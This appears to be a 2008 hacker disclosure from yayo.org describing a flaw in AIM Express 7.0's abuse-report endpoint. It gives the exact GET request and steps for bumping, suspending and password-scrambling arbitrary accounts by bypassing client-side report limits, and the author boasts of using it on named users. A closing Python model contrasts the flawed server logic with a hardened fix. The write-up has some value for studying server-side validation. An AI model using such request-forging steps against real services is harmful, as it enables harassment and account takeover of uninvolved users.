#######################[yayo.org]#########################################
###########[yayo.org]#####################################################
##                                                                      ##
## [+] vulnerable software: aim express 7.0                             ##
## [+] discovered by: pad aka padillac escobar                          ##
##                                                                      ##
## [+] capabilities: bumping, password scrambling, account suspension   ##
## [+] discovered on: 08/20/08                                          ##
## [+] partially patched on: 09/09/08                                   ##
##                                                                      ##
## [+] notes: a few people have been asking for an explanation as to    ##
##     how i have been able to bump, reset and suspend aims             ##
##     over the past 22 days, but as i have been helping aol            ##
##     patch the exploit, i concluded that it would be                  ##
##     unethical to fully disclose details of how it is done            ##
##     until the hole had begun being patched, and now                  ##
##     that it has been, i invite you to read this text and             ##
##     learn the full details behind it all. yes, i’m aware             ##
##     that “aol hacking” is an art now considered as dead as           ##
##     it is lame, but in my defense this hole took me no               ##
##     longer than 10 minutes to discover.                              ##
##                                                                      ##
###########[yayo.org]#####################################################
#############################[yayo.org]###################################
i coded an application entitled “padillac’s aim bump v1” to do all
of this work for me, but here are the technical details behind it:
equip yourself with the packet sniffer of your choice (wireshark, live http
headers for firefox, etc.) and navigate to the new aim express 7.0 page:

    http://o.aolcdn.com/aim/gromit/gm/aim_express/080815.1/WidgetMain.html

sign in with an active aim screen name and watch the response data for your
unique “aimsid” session key. it looks something like this:

    001.34576232342.2073485731:example

where “example” is your own screen name. every later api call carries this
aimsid as its session credential, so a request you build by hand with it is
indistinguishable from one the aim express client sent.

using aim express, send an instant message to your target. even if the target
has privacy settings enabled and your message never gets through, he/she is
now vulnerable to the attack.
now send the following request to api.oscar.aol.com on port 80 (terminated
with a blank line, as any http request is), as many times as you like:

    GET /im/reportSPIM?f=amf3&aimsid=[aimsid-here]&r=1&t=[target-here]&spimType=abuse&spimEvent=user HTTP/1.0
    Host: api.oscar.aol.com
see spimType=abuse? that’s right, we’re exploiting aol’s own “report” feature
for instant message spam and abuse. at this point in your aim express session
the “report” button is disabled, but that is a control in the client, and it
doesn’t stop us from submitting abuse reports to the server directly.

spimType accepts two values, “spim” and “abuse”. if your target has never sent
you an instant message, the same request with spimType=spim is refused with:

    Target not allowed. The evilee had not previously acted on the eviler.

so the server does record who has messaged whom, and it checks that record
before accepting a spam report. select spimType=abuse and the check is
skipped: the report is accepted against any screen name at all. it appears
some of aol’s developers forgot the harsh reality that for someone to “abuse”
someone else over aol instant messenger, they must first have sent that person
an abusive instant message. the abuse path needed exactly the “has the target
acted on the reporter” check that the spam path already had.
once a number of abuse reports have been accepted, the next time the target
sends an instant message to anyone, be it you or the queen of england, he/she
receives the error message:

    your screen name has been signed on from another location

the target is bumped offline immediately and cannot sign back on for 1 to 5
minutes.
i was capable of suspending and/or password scrambling aim accounts with this
flaw by targeting the same person over and over again, changing the &r=1 value
to &r=2, &r=3, &r=4 and so on after each abuse report submission. aim express
7.0 raises the “r=” value by 1 per abuse submission, but to my knowledge limits
you to only 2 abuse report submissions per session. both the counter and the
cap live in the client: the server accepts whatever r= value it is sent, so
submitting these abuse report headers to the server directly bypasses the
limitation entirely.
and if you’re curious: “disgust” was suspended (unsuspended now), and “dianaz”,
“anything” and “bangin” were password scrambled.
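the server-side logic that made this work, as an added python example (this is
not aol’s code: the behaviour of the flawed handler is reconstructed from what
is observed above, and the screen names “eviler” and “victim”, the session key,
the bump threshold and the per-pair report cap are constructed values). with
hardened=False the service runs the prior-contact check only for spimType=spim
and enforces no report limit of its own, so a stranger can be reported any
number of times; with hardened=True it runs the check for every spimType and
counts accepted reports on the server, ignoring the client-supplied r= value:

```python
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit


class ReportSpimService:
    """toy model of the /im/reportSPIM handler (not aol's code). hardened=False
    reproduces the flaw described above; hardened=True applies the fix: a
    prior-contact check for every spimType plus a server-side report cap."""

    def __init__(self, hardened, bump_threshold=3, max_reports_per_pair=2):
        self.hardened = hardened
        self.bump_threshold = bump_threshold              # constructed value
        self.max_reports_per_pair = max_reports_per_pair  # constructed value
        self.sessions = {}                  # aimsid -> screen name that owns it
        self.senders_to = defaultdict(set)  # recipient -> screen names that IMed them
        self.accepted = defaultdict(int)    # (reporter, target) -> reports accepted
        self.strikes = defaultdict(int)     # target -> total reports accepted

    def sign_in(self, aimsid, screen_name):
        self.sessions[aimsid] = screen_name

    def send_im(self, sender, recipient):
        self.senders_to[recipient].add(sender)

    def is_bumped(self, screen_name):
        """enough accepted reports gets the target kicked offline."""
        return self.strikes[screen_name] >= self.bump_threshold

    def handle(self, request_line):
        """process one raw request line of the shape quoted above; returns (status, message)."""
        try:
            method, target, _version = request_line.split()
        except ValueError:
            return 400, "Malformed request line"
        url = urlsplit(target)
        if method != "GET" or url.path != "/im/reportSPIM":
            return 404, "Not found"
        params = {k: v[0] for k, v in parse_qs(url.query).items()}
        reporter = self.sessions.get(params.get("aimsid", ""))
        if reporter is None:
            return 401, "Invalid aimsid"
        reported = params.get("t")
        spim_type = params.get("spimType")
        if not reported or spim_type not in ("spim", "abuse"):
            return 400, "Bad parameters"

        # the flaw: only spimType=spim verified that the reported user had
        # previously messaged the reporter. the hardened handler always checks.
        needs_prior_contact = self.hardened or spim_type == "spim"
        if needs_prior_contact and reported not in self.senders_to[reporter]:
            return 403, "Target not allowed. The evilee had not previously acted on the eviler."

        # the flaw, part two: the only limit on report count was the client's
        # r= counter, which the server never enforced. the hardened handler
        # counts accepted reports per (reporter, target) itself and ignores r=.
        pair = (reporter, reported)
        if self.hardened and self.accepted[pair] >= self.max_reports_per_pair:
            return 429, "Report limit reached for this target"
        self.accepted[pair] += 1
        self.strikes[reported] += 1
        return 200, "Report accepted"


def build_request(aimsid, target, r, spim_type="abuse"):
    """build a request line with the same parameters as the one quoted above."""
    return (f"GET /im/reportSPIM?f=amf3&aimsid={aimsid}&r={r}&t={target}"
            f"&spimType={spim_type}&spimEvent=user HTTP/1.0")


AIMSID = "001.34576232342.2073485731:eviler"   # constructed session key


def run_attack(hardened, reports=5):
    """'eviler' IMs 'victim' (who never replies), then files `reports` abuse
    reports with an incrementing r=. returns (status codes, victim bumped?)."""
    svc = ReportSpimService(hardened=hardened)
    svc.sign_in(AIMSID, "eviler")
    svc.send_im("eviler", "victim")
    statuses = [svc.handle(build_request(AIMSID, "victim", r))[0]
                for r in range(1, reports + 1)]
    return statuses, svc.is_bumped("victim")


if __name__ == "__main__":
    print("flawed:  ", run_attack(hardened=False))
    print("hardened:", run_attack(hardened=True))
```

against the flawed service every report from a stranger comes back 200 and
the victim is bumped; against the hardened one the same requests come back
403, and even a legitimate reporter who really was messaged by the target is
cut off by the server once the per-pair cap is reached, no matter what r=
value the client puts in the query string.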
thanks for reading.
love,
pad